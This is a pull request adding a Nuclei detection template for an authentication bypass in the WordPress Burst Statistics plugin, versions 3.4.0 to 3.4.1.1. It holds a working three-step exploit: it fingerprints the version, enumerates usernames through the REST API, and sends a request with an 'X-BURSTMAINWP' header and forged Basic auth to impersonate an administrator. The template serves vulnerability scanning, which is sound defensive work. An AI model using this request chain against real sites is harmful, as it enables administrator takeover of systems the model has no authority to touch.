### PR TITLE
Add CVE-2026-8181.yaml - WordPress Burst Statistics 3.4.0-3.4.1.1 - Authentication Bypass

### DIFF
--- a/http/cves/2026/CVE-2026-8181.yaml
+++ b/http/cves/2026/CVE-2026-8181.yaml
@@ -1,0 +1,94 @@
+id: CVE-2026-8181
+
+info:
+  name: WordPress Burst Statistics 3.4.0-3.4.1.1 - Authentication Bypass
+  author: 0x_Akoko
+  severity: critical
+  description: |
+    Burst Statistics – Privacy-Friendly WordPress Analytics plugin 3.4.0 to 3.4.1.1 contains an authentication bypass caused by incorrect return-value handling in is_mainwp_authenticated() function, letting unauthenticated attackers impersonate administrators, exploit requires knowledge of an administrator username.
+  impact: |
+    Unauthenticated attackers can impersonate administrators, leading to privilege escalation and full control over the application.
+  remediation: |
+    Update to a version later than 3.4.1.1 or the latest available version.
+  reference:
+    - https://github.com/murrez/CVE-2026-8181
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-8181
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-8181
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: really-simple-plugins
+    product: burst-statistics
+    publicwww-query: "/wp-content/plugins/burst-statistics/"
+  tags: cve,cve2026,wp,wp-plugin,wordpress,burst-statistics,auth-bypass,unauth
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/burst-statistics/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(to_lower(body), "burst statistics")'
+          - 'compare_versions(version, ">= 3.4.0", "<= 3.4.1.1")'
+        internal: true
+        condition: and
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([\w.]+)'
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/wp/v2/users"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"slug\"")'
+        internal: true
+        condition: and
+
+    extractors:
+      - type: regex
+        name: admin_user
+        part: body
+        group: 1
+        regex:
+          - '"slug":"([^"]+)"'
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-json/wp/v2/users/me?context=edit HTTP/1.1
+        Host: {{Hostname}}
+        X-BURSTMAINWP: 1
+        Authorization: Basic {{base64(admin_user + ':x')}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "\"id\"", "\"email\"", "\"roles\"", "\"administrator\"")'
+          - 'contains(content_type, "application/json")'
+        condition: and
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - '.email'


### PR DESCRIPTION
CVE-2026-8181 details an authentication bypass vulnerability in the WordPress Burst Statistics plugin, allowing unauthenticated attackers to impersonate administrators. The YAML file includes information about the vulnerability, its impact, remediation steps, and HTTP request flow for exploitation.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
